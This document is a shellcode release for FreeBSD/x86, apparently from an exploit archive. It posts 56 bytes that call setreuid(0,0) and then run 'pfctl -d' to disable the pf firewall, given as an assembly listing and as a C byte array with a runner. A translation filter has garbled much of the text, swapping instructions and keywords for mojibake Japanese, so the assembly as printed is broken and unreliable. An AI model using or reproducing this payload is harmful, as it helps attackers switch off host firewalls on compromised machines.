FreeBSD/x86 - setreuid(0, 0) & execve(pfctl -d)

¤³¤Î¥Ú¡¼¥¸¤ÏEtoJÃà¸ìËÝÌõ¥Õ¥£¥ë¥¿¤Ë¤è¤Ã¤ÆËÝÌõÀ¸À®¤µ¤ì¤Þ¤·¤¿¡£
FreeBSD/x86 - setreuid(0, 0) & execve(pfctl -d) - 56 bytes
                   ***(C)oDed bY suN8Hclf***
               DaRk-CodeRs Group À¸»º¡¿»ºÊª, kid
     [FreeBSD x86 setreuid(0, 0) + execve(pfctl -d) 56 bytes]

The simples way to ÌµÇ½¤Ë¤¹¤ë the FreeBSD's packet filter. We do not
¹ÈÄ¬¡¿Å¦È¯¤¹¤ë all »ÙÇÛ¤¹¤ës (pfctl -F all) but only turn the firewall off.

µÄ²ñ code:
-------------------------code.asm--------------------------
section .text
Á´À¤³¦¤Î _start

_start:

	xor eax, eax
	²¡¤·¿Ê¤á¤ë eax
	²¡¤·¿Ê¤á¤ë eax
	mov al, 126
	²¡¤·¿Ê¤á¤ë eax
	int 0x80           ; setreuid()

	xor eax, eax
	²¡¤·¿Ê¤á¤ë eax
	²¡¤·¿Ê¤á¤ë word 0x642d
	mov ecx, esp       ; ecx ´Þ¤à¡¿Éõ¤¸¹þ¤á¤ës a pointer to "-d" string

	²¡¤·¿Ê¤á¤ë eax 
	²¡¤·¿Ê¤á¤ë 0x6c746366
	²¡¤·¿Ê¤á¤ë 0x702f6e69
	²¡¤·¿Ê¤á¤ë 0x62732f2f
	mov ebx, esp       ; ebx ´Þ¤à¡¿Éõ¤¸¹þ¤á¤ës a pointer to "//sbin/pfctl" string

	²¡¤·¿Ê¤á¤ë eax
	²¡¤·¿Ê¤á¤ë ecx
	²¡¤·¿Ê¤á¤ë ebx
	mov ecx, esp

	²¡¤·¿Ê¤á¤ë eax
	²¡¤·¿Ê¤á¤ë ecx
	²¡¤·¿Ê¤á¤ë ebx
	mov al, 0x3b
	²¡¤·¿Ê¤á¤ë eax
	int 0x80          ; execve()

	xor eax, eax
	²¡¤·¿Ê¤á¤ë eax
	²¡¤·¿Ê¤á¤ë eax
	int 0x80          ; ½Ð¸ý()
-------------------------code.asm--------------------------
And C code:
-------------------------code.c----------------------------
#´Þ¤à "stdio.h"

char shellcode[]=
"\x31\xc0\x50\x50\xb0\x7e\x50\xcd\x80\x31\xc0\x50\x66\x68\x2d\x64" 
"\x89\xe1\x50\x68\x66\x63\x74\x6c\x68\x69\x6e\x2f\x70\x68\x2f\x2f"
"\x73\x62\x89\xe3\x50\x51\x53\x89\xe1\x50\x51\x53\xb0\x3b\x50\xcd"
"\x80\x31\xc0\x50\x50\xcd\x80";

int main(int argc, char *argv[]){
	int (*func)();
	func=(int (*)())shellcode;
	(int)(*func)();
}
-------------------------code.c----------------------------

Greetz to: 0in, cOndemned (and to other DaRk-CodeRs members), str0ke, e.wiZz!, 
           Katharsis, doctor and many others...
Visit us : www.dark-coders.pl